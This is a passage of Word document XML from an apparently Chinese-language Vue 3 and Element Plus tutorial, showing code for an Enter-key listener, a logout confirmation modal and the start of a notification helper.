    <w:p w14:paraId="63108FB3" w14:textId="1EE49B33" w:rsidR="001329A4" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:t xml:space="preserve">import { ref, reactive, </w:t>
      </w:r>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>onMounted, onBeforeUnmount</w:t>
      </w:r>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00285A0F">
        <w:t>} from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D65BB5E" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2F946F" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125E3693" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>监听回车事件的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43606D7C" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>function onKeyUp(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554FDD8" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.log(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089B3278" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (e.key == "Enter") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EBE7C1" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        onSubmit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2926BFDD" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B5893" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A1F0B2" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379BA8B8" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>添加键盘监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A45C54" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>onMounted(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176F946" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    document.addEventListener('keyup', onKeyUp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C45EED0" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E7691F" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B88FA4" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>移除键盘监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B8E6C" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>onBeforeUnmount(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D43AB36" w14:textId="77777777" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    document.removeEventListener('keyup', onKeyUp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D1C9DC" w14:textId="580C189F" w:rsidR="001329A4" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539C60E" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646FC559" w14:textId="488F4B43" w:rsidR="001329A4" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="700" w:name="_Toc159780130"/>
      <w:r w:rsidRPr="005F6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出登录功能实现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="700"/>
    </w:p>
    <w:p w14:paraId="2EF2E55D" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="00181907" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECBF87B" w14:textId="7AFA0859" w:rsidR="005F6D50" w:rsidRDefault="00061D94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先把演示数据去掉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CDE4A0" w14:textId="77777777" w:rsidR="00F22B42" w:rsidRDefault="00F22B42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320857AF" w14:textId="33D984BE" w:rsidR="005F6D50" w:rsidRDefault="0043377B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pages</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00F22B42">
        <w:t>index.vue</w:t>
      </w:r>
      <w:r w:rsidR="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简洁</w:t>
      </w:r>
      <w:r w:rsidR="00F22B42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C7A0B" w14:textId="77777777" w:rsidR="00F22B42" w:rsidRDefault="00F22B42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FA20D8" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里设计推出登录，首先设计一个“消息弹出框”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CAAFC6" w14:textId="0620CEF3" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC611D7" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1172B">
        <w:t>https://element-plus.org/zh-CN/component/message-box.html#%E7%A1%AE%E8%AE%A4%E6%B6%88%E6%81%AF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B3DAF" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D780DA" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1376DCCD" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52016163" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后台首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0206A8" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC61FE4" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        {{ $store.state.user.username }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC244E4" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D9E195" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-button @click="logout"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AFC341" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE2824F" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ADE78B" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249886FB" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7F099A" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0182F" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { showModal } from '~/composables/util'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CCA89B" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746CFA80" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>function logout() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D3098C" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    showModal("</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是否要退出登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2221FBE1" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        .then(res=&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8AD2D" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            console.log("</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A840F0" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CFE366" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0518959E" w14:textId="405379F9" w:rsidR="005F6D50" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9DC08E" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRPr="00181907" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F0E21A" w14:textId="1F354DB4" w:rsidR="005F6D50" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>封装退出登录按钮</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>rc/composables/util.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A850F3" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { ElNotification, ElMessageBox, ElMessage } from 'element-plus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3659E2" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13232A9E" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47269816" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export function toast(message, type = "success", duration = 3000, dangerouslyUseHTMLString = false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA54FAC" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ElNotification({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EE3E7F" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        message: message,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE04CC7" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
